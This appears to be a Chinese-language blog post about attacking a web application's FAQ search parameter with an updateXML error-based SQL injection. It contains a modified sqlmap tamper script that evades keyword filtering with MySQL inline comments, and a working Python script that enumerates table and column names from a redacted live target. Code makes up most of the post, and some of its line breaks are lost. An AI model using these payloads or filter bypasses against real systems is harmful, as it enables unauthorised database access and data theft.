updateXML 注入 python 脚本-白红宇

updateXML 注入 python 脚本

阅读量：5816 次

发布时间：2019-06-18

本文共 2928 字，大约阅读时间需要 9 分钟。

用SLQMAP来跑updateXML注入发现拦截关键字，然后内联注入能绕，最后修改halfversionedmorekeywords.py脚本，结果SQLMAP还是跑不出来。>_<

halfversionedmorekeywords.py脚本修改后如下：

#!/usr/bin/env pythonimport osimport refrom lib.core.common import singleTimeWarnMessagefrom lib.core.data import kbfrom lib.core.enums import DBMSfrom lib.core.enums import PRIORITYfrom lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS__priority__ = PRIORITY.HIGHERdef dependencies():    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))def tamper(payload, **kwargs):    def process(match):        word = match.group('word')        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:            return match.group().replace(word, "/*!12345 %s*/" % word)        else:            return match.group()    retVal = payload    if payload:        retVal = re.sub(r"(?<=\W)(?P
     
      [A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)        retVal = retVal.replace(" /*!0", "/*!0")    return retVal

自己写个脚本得了，于是有了以下代码，成功跑出表名和字段。

#coding=utf-8import requestsimport re, binascii, warnings, timewarnings.filterwarnings("ignore")table_name_list = []for k in range(1,112):    #遍历表名    url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&" \          "searchopt=content&searchkey=1' /*!and*//*!updateXML*/" \          "(1,concat(0x7e, (select /*!table_name*/ /*!from*/ information_schema.tables limit " + str(k) + ",1),0x7e),3)-- -" \          "&x=4&y=23"    req = requests.get(url)    a = re.findall(r"'~(.*)~'", req.text)    if a:table_name_list.append(a[0])    else:passprint table_name_listfor i in  table_name_list:    print u"表名为：",i #输出表名    #遍历字长度    url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" \          "' /*!and*//*!updateXML*/(1,concat(0x7e, " \          "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!count(column_name)*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " \          "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ ),0x7e),3)-- -&x=4&y=23"    req = requests.get(url)    b = re.findall(r"'~(.*)~'",req.text)    if b:        m = int(b[0].strip("~"))+1        print u"行数为：",m #输出行数        for n in range(1,m):            #遍历字段名            url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" \                  "' /*!and*//*!updateXML*/(1,concat(0x7e, " \                  "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!column_name*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " \                  "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ limit "+str(n)+",1),0x7e),3)-- -&x=4&y=23"            req = requests.get(url)            c = re.findall(r"'~(.*)~'", req.text)            if c:print u"字段：",str(c).strip("[u'~").strip("~']")            else:pass    else:pass